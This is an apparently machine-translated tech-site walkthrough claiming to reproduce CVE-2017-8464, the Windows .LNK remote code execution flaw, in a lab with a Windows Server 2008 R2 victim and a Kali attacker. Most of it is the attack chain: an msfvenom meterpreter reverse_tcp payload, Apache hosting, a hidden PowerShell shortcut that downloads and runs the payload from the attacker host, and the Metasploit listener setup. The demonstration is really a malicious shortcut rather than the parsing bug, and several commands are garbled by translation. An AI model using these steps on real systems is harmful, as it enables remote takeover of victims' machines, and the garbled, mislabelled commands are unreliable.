Shulou(Shulou.com)05/31 Report--

In this issue, the editor will bring you about how to achieve remote command execution loophole CVE-2017-8464 reproduction, the article is rich in content and professional analysis and description for you, I hope you can get something after reading this article.

Overview of 0x00 vulnerabilities

An attacker can present to the user a removable drive or remote share that contains malicious .LNK files and associated malicious binaries. When a user opens this drive (or remote share) in Windows Explorer or any other application that parses a .LNK file, a malicious binary executes code of the attacker's choice on the target system, and an attacker who successfully exploits this vulnerability can gain the same user privileges as the local user. Note: .LNK is the file type suffix name of the application shortcut file in the windows system.

There is a high-risk vulnerability of remote execution of arbitrary code in Windows system when parsing shortcuts. Hackers can trigger vulnerabilities through U disk, network sharing and other ways to completely control the user system, resulting in high security risk.

0x01 scope of influence

Microsoft Windows 10 Version 1607 for 32-bit Systems

Microsoft Windows 10 Version 1607 for x64-based Systems

Microsoft Windows 10 for 32-bit Systems

Microsoft Windows 10 for x64-based Systems

Microsoft Windows 10 version 1511 for 32-bit Systems

Microsoft Windows 10 version 1511 for x64-based Systems

Microsoft Windows 10 version 1703 for 32-bit Systems

Microsoft Windows 10 version 1703 for x64-based Systems

Microsoft Windows 7 for 32-bit Systems SP1

Microsoft Windows 7 for x64-based Systems SP1

Microsoft Windows 8.1 for 32-bit Systems

Microsoft Windows 8.1 for x64-based Systems

Microsoft Windows RT 8.1

Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1

Microsoft Windows Server 2008 R2 for x64-based Systems SP1

Microsoft Windows Server 2008 for 32-bit Systems SP2

Microsoft Windows Server 2008 for Itanium-based Systems SP2

Microsoft Windows Server 2008 for x64-based Systems SP2

Microsoft Windows Server 2012

Microsoft Windows Server 2012 R2

Microsoft Windows Server 2016

0x02 environment building

Victim: windows2008R2

Attack plane: kali

1. Download the vulnerable version of the system image in msdn and install the image using the VMware virtual machine

Madn download address: https://msdn.itellyou.cn/

two。 After the download is complete, use VMware to install the virtual machine. Note: the installation method is up to date with Baidu

Recurrence of 0x03 vulnerabilities

1. Open kali and use msfvenom under kali to generate a shell of ps1

Msfvenom-p windows/x64/meterpreter/reverse_tcp lhost=192.168.3.6 lport=9999-f psh-reflection > / root/test/shell.ps1

two。 Copy the generated shell.ps1 to the / var/www/html directory, and then open the apache service. The shell.ps1 file can be accessed directly in the browser.

Cp shell.ps1 / var/www/htnl

Service apache2 start

3. On the injured machine, right-click on the desktop to create a powersehll remote shortcut with the command powershell.exe

Powershell-windowstyle hidden-exec bypass-c "IEX (New-Object Net.WebClient) .DownloadString ('http://192.168.3.6/shell.ps1');test.ps1"

4. Use msf to configure the listening module in kali and run

Use exploit/multi/handler

Set payload windows/x64/meterpreter/reverse_tcp

Show options

Set LHOST xxx.xxx.xx.x

Set lport 9999

Run

5. After the configuration is complete and running, when the victim runs the powershell file that has just been created, you can see that kali bounces shell.

0x04 repair recommendation

1. It is recommended that you install the official patch

two。 Install protection software

The above is how to achieve remote command execution vulnerability CVE-2017-8464, which is shared by the editor. If you happen to have similar doubts, please refer to the above analysis to understand. If you want to know more about it, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.